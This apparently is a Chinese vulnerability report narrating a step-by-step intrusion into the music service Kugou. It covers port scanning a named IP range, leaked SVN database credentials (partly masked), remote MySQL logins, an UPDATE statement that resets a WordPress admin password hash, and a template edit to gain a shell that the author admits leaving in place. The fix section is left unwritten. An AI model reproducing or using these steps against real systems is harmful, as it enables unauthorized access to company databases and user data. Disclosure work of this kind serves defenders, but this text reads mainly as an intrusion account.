今天上百度准备看一集火影睡了,没成想tudou被劫持了。-_-||!
打开酷狗音乐吧,听听现场主播哼几首就睡了,结果木钱钱。-_-||!
那就进去看看吧!Let's Go!~Ps:xsser我想问一句,Rank有木有40 60?
(鉴于对酷狗整体架构持久影响,详细说明做了模糊处理,未模糊版本联系nightwi3h@qq.com索取)
No.0 分析判断:

  酷狗作为以流媒体服务为主的厂商,肯定不少CDN、分发负载、P2P管理之类的服务器,作为木钱钱的人士,还是奔内网数据库去吧!

  难点在于如何抛开酷狗大量的CDN找到脆弱的系统边界。

No.1 搜集信息:

  于是乎,Google墙的太厉害,借助度娘吧。找到两个比较目测没有加CDN的域名:xxx1.kugou.com[113.106.x.x3] xxx2.kugou.com [183.60.x.x] 183.60段比较熟悉,作为一个业余的安全运维,这个段很多高防,当然CDN也比较多,放弃吧。

  扫描下113.106.x.x3/24吧:(仅仅留下后续有用的结果)

  
113.106.x.x1 H3C Router
  113.106.x.x3 3306
  113.106.x.x7 3306
  113.106.x.x9 3306
  113.106.x.x9 80

  分析:看来H3C后面都是酷狗的了,重点关注一下吧:)

  挂上SRCWVS[] 扫描一下Web吧,轻易获得一个SVN源码泄露:


  $dbConfig['default'] = array(
   'DB_TYPE' => 'mysql',
   'DB_CHARSET' => 'utf8',
   'DB_PERSISTENT' => false,
   'DB_HOST'=>'10.10.10.7',
   'DB_USER'=>'admin',
   'DB_PASSWD'=>'jjxx',
   'DB_NAME'=>'mv',
  );
  //推荐数据库配置。
  $dbConfig['tuijian'] = array(
   'DB_TYPE' => 'mysql',
   'DB_CHARSET' => 'utf8',
   'DB_PERSISTENT' => false,
   'DB_HOST'=>'10.10.10.3',
   'DB_USER'=>'outtransql',
   'DB_PASSWD'=>'xxoo',
   'DB_NAME'=>'tuijian'
  

  (获得酷狗PHP框架源码和内网数据库连接信息)

  No.3:分析:

x9这台源码应该是酷狗自己开发的PHP框架,安全性还不错,简单的Code漏洞基本上没啥,不过最想的先取个BashShell。既然框架不能利用,数据库在内网。咋办呢?瓶颈来了。给我一首歌的时间。哦,懂了这种开发测试机一般都会写距离本机不远的数据库,试试人品?

  No.4:数据库新发现:


  10.10.10.7 10.10.10.3 10.10.10.9
  113.106.x.x7 113.106.x.x3 113.106.x.x9

  懂了,这种貌似是3306没防火外联了

  Cmd>mysql -h 113.106.x.x3 -u outtransql -p

  

  Bingo! 数据库OK!


  mysql> show databases;
  +--------------------+
  | Database           |
  +--------------------+
  | information_schema |
  | StandardMusic      |
  | UnStandardMusic    |
  | cloud              |
  | cr_debug           |
  | imagesetting       |
  | ios_jingpin        |
  | jinzhj             |
  | klok               |
  | kml                |
  | kugou01            |
  | kugoublog          |
  +--------------------+
  32 rows in set  

  数据库很多,用户权限都是root,都允许远程登录(我有预感,这回酷狗悲剧了-_-||)

  

  No.5寻找数据库突破目标:

  经过以上测试后,连接上的几个数据库内容丰富,但是如何能利用数据库进入酷狗内网呢?对了,就你了,KugouX库,看内容是个WordPress的Blog,恩不错。

  果断X.kugou.com 原来是个未完工的Blog,好吧,别怪我了。


  update kg_users set user_pass='21232f297a57a5a743894a0e4a801fc3’ where user_login='Xadmin';

  登录-改模板-获取BashShell OK!

  

  No.6:简单的架构分析:

  Web几个报错可以判定:酷狗用的是NFS(或者其他网络文件系统)/data0 /data1 /data2

  好吧:


  [/data2/www.kugou.com/]$ ls
  2012
  clientshare
  common
  default.html
  download
  fm2
  ..........
  yueku
 

  Ps:看来该收手了,点到为止吧,改首页什么的不是我的菜!(顺道BS一下那个劫持土豆的,我都搞定了,我的DNS Flush的N+1次居然还没好,你娃是不是改了别人NS哦- -)

  最后说几句:除了PHPShell,其他动过的都改回来了。


修复方案:  

想听我说吗?No.1.2.3.4.5.6.7.8.9.N(Ps:不是我懒,太晚了睡了,明天学校坑爹的数电考试啊 - -悲剧。)这个修复方案可以写成一整套方案了(前提是比较了解酷狗架构之后)就暂时不写了。

祝你们把酷狗做的更好!我是忠实用户。